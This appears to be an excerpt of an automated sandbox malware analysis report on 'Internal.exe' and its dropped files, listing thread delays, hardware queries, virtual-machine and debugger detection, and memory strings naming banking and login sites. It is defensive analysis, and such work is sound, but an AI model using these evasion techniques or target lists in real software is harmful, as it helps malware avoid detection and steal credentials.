                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -596344s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -596187s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -596078s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595946s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595836s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595705s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595578s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595468s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595359s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595249s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595140s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -595028s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 5868Thread sleep time: -300000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594922s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594797s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594678s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594547s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594429s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594309s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -594184s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593781s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593638s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593523s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593406s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593297s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593163s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -593046s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592902s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592787s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592656s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592546s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592437s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592328s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592219s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -592094s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591984s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591875s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591762s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591562s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591225s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -591083s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 3160Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Blockcomcrt\AgentMonitor.exe TID: 5348Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Blockcomcrt\AgentMonitor.exe TID: 5760Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\csrss.exe TID: 4924Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\csrss.exe TID: 1904Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Blockcomcrt\WmiPrvSE.exe TID: 4424Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\csrss.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\csrss.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FA69B FindFirstFileW,FindFirstFileW,1_2_004FA69B
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE685B NtQueryInformationProcess,GetSystemInfo,1_2_04AE685B
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599828Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599016Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598250Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597875Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597312Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597094Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596187Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596078Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595946Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595836Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595705Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595468Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595359Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595249Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595140Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595028Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594922Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594678Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594547Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594429Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594309Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594184Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593781Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593638Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593523Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593406Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593297Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593163Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593046Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592902Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592787Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592656Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592546Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591984Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591875Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591762Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591225Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591083Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: zHoCQG8Zet.16.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: discord.comVMware20,11696494690f
                                    Source: zHoCQG8Zet.16.drBinary or memory string: AMC password management pageVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: outlook.office.comVMware20,11696494690s
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                                    Source: zHoCQG8Zet.16.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                                    Source: zHoCQG8Zet.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                                    Source: zHoCQG8Zet.16.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                                    Source: zHoCQG8Zet.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                                    Source: zHoCQG8Zet.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                                    Source: w32tm.exe, 00000024.00000002.1810452221.00000259CB3F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                                    Source: AgentMonitor.exe, 00000006.00000002.1767367913.000000001BDE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2691954450.000000001BA60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                                    Source: zHoCQG8Zet.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                                    Source: zHoCQG8Zet.16.drBinary or memory string: tasks.office.comVMware20,11696494690o
                                    Source: wscript.exe, 00000002.00000003.1707823048.00000000032A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~Y
                                    Source: AgentMonitor.exe, 00000006.00000002.1767592476.000000001BE59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}92
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                                    Source: zHoCQG8Zet.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                                    Source: Internal.exe, 00000001.00000002.1430405322.0000000002DD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: AgentMonitor.exe, 00000006.00000002.1767536504.000000001BE22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                                    Source: Internal.exe, Internal.exe, 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                                    Source: zHoCQG8Zet.16.drBinary or memory string: dev.azure.comVMware20,11696494690j
                                    Source: zHoCQG8Zet.16.drBinary or memory string: global block list test formVMware20,11696494690
                                    Source: wscript.exe, 00000002.00000003.1707823048.00000000032A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&+
                                    Source: Internal.exe, Internal.exe, 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                                    Source: zHoCQG8Zet.16.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                                    Source: Internal.exe, 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                    Source: zHoCQG8Zet.16.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                                    Source: zHoCQG8Zet.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                                    Source: zHoCQG8Zet.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                                    Source: C:\Users\user\Desktop\Internal.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Hides threads from debuggers
                                    Source: C:\Users\user\Desktop\Internal.exeThread information set: HideFromDebuggerJump to behavior
                                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                                    Source: C:\Users\user\Desktop\Internal.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\Desktop\Internal.exeFile opened: SIWDEBUG
                                    Source: C:\Users\user\Desktop\Internal.exeFile opened: NTICE
                                    Source: C:\Users\user\Desktop\Internal.exeFile opened: SICE
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00517DEE mov eax, dword ptr fs:[00000030h]1_2_00517DEE
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE606B mov eax, dword ptr fs:[00000030h]1_2_04AE606B
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE6390 mov eax, dword ptr fs:[00000030h]1_2_04AE6390
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess token adjusted: Debug
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess token adjusted: Debug
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess token adjusted: Debug
